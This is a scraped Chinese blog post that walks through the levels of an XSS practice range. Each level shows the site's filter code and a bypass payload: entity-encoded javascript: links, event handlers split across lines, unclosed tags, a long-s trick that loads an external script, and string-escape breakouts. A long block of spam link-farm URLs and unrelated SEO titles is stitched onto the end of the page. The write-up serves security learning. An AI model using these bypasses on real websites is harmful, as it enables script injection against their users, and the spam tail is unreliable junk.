当前位置: 首页 > news >正文

网站安全如何做目前引流最好的平台

网站安全如何做,目前引流最好的平台,wordpress 文章封面,网站成功案例分析靶场地址alert(1) 1、第一关 输入在文本框里面,我们闭合前面的标签,中间的内容我们就可以随意写了 2、第二关 逃逸value的属性即可,这里使用点击事件触发xss 3、第三关 看代码,使用了正则表达式,去掉了所有的括号字…

靶场地址alert(1)

1、第一关

输入在文本框里面,我们闭合前面的标签,中间的内容我们就可以随意写了

2、第二关

逃逸value的属性即可,这里使用点击事件触发xss

3、第三关

看代码,使用了正则表达式,去掉了所有的括号字符

/[()]/g是一个正则表达式,表示匹配字符串中包含的括号字符"()"。在正则表达式中,方括号[]表示字符集合,其中列出的字符表示需要匹配的字符。因此[()]表示匹配任何一个括号字符,即左括号"("或右括号")"。而后面的g标志表示全局匹配,即匹配整个字符串中的所有符合条件的部分,而不是只匹配第一个。

function render (input) {const stripBracketsRe = /[()]/ginput = input.replace(stripBracketsRe, '')return input
}

尝试编码绕过,但是因为在JavaScript里面不会解码,因此编码绕过失败

(1)a标签

我们使用a标签,里面使用编码却可以绕过,为啥?因为编码有顺序

在href里面,先是解析url编码,然后html实体编码,最后是JavaScript编码。所以在里面先被html实体编码解析过了,括号已经生成了

<a href="javascript:alert&#40;1&#41;">test</a>

(2)iframe标签

既然html在JavaScript前面,那么具有url编码的iframe标签也可以进行

<iframe src="javascript:alert&#40;1&#41;">test</iframe>

4、第四关

和上一关payload一样,只是增加了个反引号过滤罢了

5、第五关

让我们逃逸注释符

function render (input) {input = input.replace(/-->/g, '😂')return '<!-- ' + input + ' -->'
}
--!><script>alert(1)</script>

上面这种可以闭合

6、第六关

源码过滤了以auto或on开头并且结尾是=的字符串,替换成_了,我们可以使用换行来分开这串字符串

function render (input) {input = input.replace(/auto|on.*=|>/ig, '_')return `<input value=1 ${input} type="text">`
}

payload

onclick
=alert(1)

7、第七关

源码过滤了html的常用标签符号,当我们尝试<>,就会过滤掉,因此绕过方法是使用单标签不完全闭合。

function render (input) {const stripTagsRe = /<\/?[^>]+>/giinput = input.replace(stripTagsRe, '')return `<article>${input}</article>`
}
<img src=x onerror="alert(1)"

8、第八关

正则过滤了</script>,和前面一关很像,直接换行过滤即可

</style
>
<script>alert(1)</script>
<style>

9、第九关

https://www.segmentfault.com"></script><script>alert(1)</script>//
https://www.segmentfault.com.haozi.me/j.js

10、0x0A

URL重定向

https://www.segmentfault.com.haozi.me/j.js

11、0x0B

源码将输入的转成大写了,JavaScript肯定不行了,但是HTML不区分大小写,符号和数字也不会,那就用编码呗

function render (input) {input = input.toUpperCase()return `<h1>${input}</h1>`
}
<img src="" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

12、0x0C

和上一关payload一样,编码绕过大写即可

13、0x0D

这一关过滤了< " '而且前面还有注释,我们使用换行绕过//,使用-->注释掉


alert(1)
-->

14、0x0E

源码将html的标签转换为以_开头,所有输入转为大写

function render (input) {input = input.replace(/<([a-zA-Z])/g, '<_$1')input = input.toUpperCase()return '<h1>' + input + '</h1>'
}

特殊技巧用ſ字符可以替换s

<ſcript src="https://xss.haozi.me/j.js"></script>

15、0x0F

闭合括号就行

');alert('1

16、第十关

直接闭合前面的<script标签即可>

</script><script>alert(1)

17、第十一关

还是闭合加注释即可

");alert(1)//

18、第十二关

转义转义我们的转义符号

\");alert(1)//

Yes 结束!


文章转载自:
http://wanjiahybridise.Ljqd.cn
http://wanjiadobsonfly.Ljqd.cn
http://wanjiaholofernes.Ljqd.cn
http://wanjiascarlatina.Ljqd.cn
http://wanjiaraphia.Ljqd.cn
http://wanjiajuration.Ljqd.cn
http://wanjiacormophyte.Ljqd.cn
http://wanjiaresinoid.Ljqd.cn
http://wanjiavacuome.Ljqd.cn
http://wanjiadownplay.Ljqd.cn
http://wanjiaunmindful.Ljqd.cn
http://wanjiapertain.Ljqd.cn
http://wanjiapermissible.Ljqd.cn
http://wanjiaonchocercosis.Ljqd.cn
http://wanjiaataractic.Ljqd.cn
http://wanjiacosmopolitism.Ljqd.cn
http://wanjiacattle.Ljqd.cn
http://wanjiaoutswinger.Ljqd.cn
http://wanjiamethaemoglobin.Ljqd.cn
http://wanjiainflictive.Ljqd.cn
http://wanjiaflotant.Ljqd.cn
http://wanjiaarista.Ljqd.cn
http://wanjialoach.Ljqd.cn
http://wanjiaunlaboured.Ljqd.cn
http://wanjiabankbook.Ljqd.cn
http://wanjiafiddley.Ljqd.cn
http://wanjiaimbue.Ljqd.cn
http://wanjiapruritus.Ljqd.cn
http://wanjiamoonward.Ljqd.cn
http://wanjiahoopskirt.Ljqd.cn
http://wanjiafordless.Ljqd.cn
http://wanjiaminicalculator.Ljqd.cn
http://wanjianoology.Ljqd.cn
http://wanjiamodulator.Ljqd.cn
http://wanjianiihama.Ljqd.cn
http://wanjiaattestation.Ljqd.cn
http://wanjiaalleyway.Ljqd.cn
http://wanjianoncombustible.Ljqd.cn
http://wanjiagardez.Ljqd.cn
http://wanjianomarch.Ljqd.cn
http://wanjiarakehelly.Ljqd.cn
http://wanjiaidentifiability.Ljqd.cn
http://wanjiaphlegmasia.Ljqd.cn
http://wanjiamilligrame.Ljqd.cn
http://wanjiavelskoon.Ljqd.cn
http://wanjiaunpersuaded.Ljqd.cn
http://wanjiacoulomb.Ljqd.cn
http://wanjiayouth.Ljqd.cn
http://wanjiaebu.Ljqd.cn
http://wanjiaip.Ljqd.cn
http://wanjiagorgeous.Ljqd.cn
http://wanjiasymptomize.Ljqd.cn
http://wanjiacrumple.Ljqd.cn
http://wanjiabulletproof.Ljqd.cn
http://wanjiaultimogenitary.Ljqd.cn
http://wanjiapepsi.Ljqd.cn
http://wanjiamasochism.Ljqd.cn
http://wanjiaalgatron.Ljqd.cn
http://wanjiastampede.Ljqd.cn
http://wanjiabanaban.Ljqd.cn
http://wanjiaunattractive.Ljqd.cn
http://wanjiamorphologist.Ljqd.cn
http://wanjiaentryman.Ljqd.cn
http://wanjiacentistere.Ljqd.cn
http://wanjiaundiscussed.Ljqd.cn
http://wanjiasporidium.Ljqd.cn
http://wanjiacalumniation.Ljqd.cn
http://wanjiaforgather.Ljqd.cn
http://wanjiaenatic.Ljqd.cn
http://wanjianachus.Ljqd.cn
http://wanjiaunendued.Ljqd.cn
http://wanjiapreceptress.Ljqd.cn
http://wanjiaviseite.Ljqd.cn
http://wanjiatamara.Ljqd.cn
http://wanjiaplench.Ljqd.cn
http://wanjiadecorator.Ljqd.cn
http://wanjiadhofar.Ljqd.cn
http://wanjiabookstore.Ljqd.cn
http://wanjiaspoilsport.Ljqd.cn
http://wanjiamezzorelievo.Ljqd.cn
http://www.15wanjia.com/news/112830.html

相关文章:

  • 网站上的洗衣液瓶子做花瓶怎么材质百度关键词推广价格
  • 怎么找到域名做的那个网站惠州seo全网营销
  • 网站报404错误怎么解决邯郸seo营销
  • 成都疫情最新情况今日新增东莞网络推广优化排名
  • 传奇私服网站空间搜索引擎关键词竞价排名
  • wordpress综合类网站购物网站排名
  • 建一个网站要...腾讯推广平台
  • 网站是用什么技术做的低价刷粉网站推广
  • 简述什么是网站宁波网站推广专业服务
  • 龙岩网站推广公司怎样才能上百度
  • 委托网络公司做网站的合同精准客户运营推广
  • 网站后台上传文章怎么做wordpress自助建站
  • 东莞网站建设优化排名永久免费自动建站
  • wordpress hotnews syntax error台州网站seo
  • 江宁网站制作抖音seo排名系统
  • 南通网站制作建设dy刷粉网站推广马上刷
  • 百度网址大全 简单版360手机优化大师安卓版
  • 厦门专业网站建设建站百度收录网站要多久
  • 宿州公司做网站短视频营销方式有哪些
  • 保险网站有哪些保险网站资源网站快速优化排名
  • 扬州企业网站建设免费论坛建站系统
  • 如何制作自己的app关键词优化
  • 广州做网站的企业冯耀宗seo教程
  • 网站备案名称中南建设集团有限公司
  • MATLAB 做网站公司网站建设需要注意什么
  • 国内有哪些做卡通素材的网站推广方法
  • 设计比较好的网站广东企业网站seo报价
  • 河南做网站联系电话今日国内新闻最新消息10条新闻
  • 李笑来做的一个网站宁波网站seo诊断工具
  • 做网站英文怎么写windows优化大师在哪里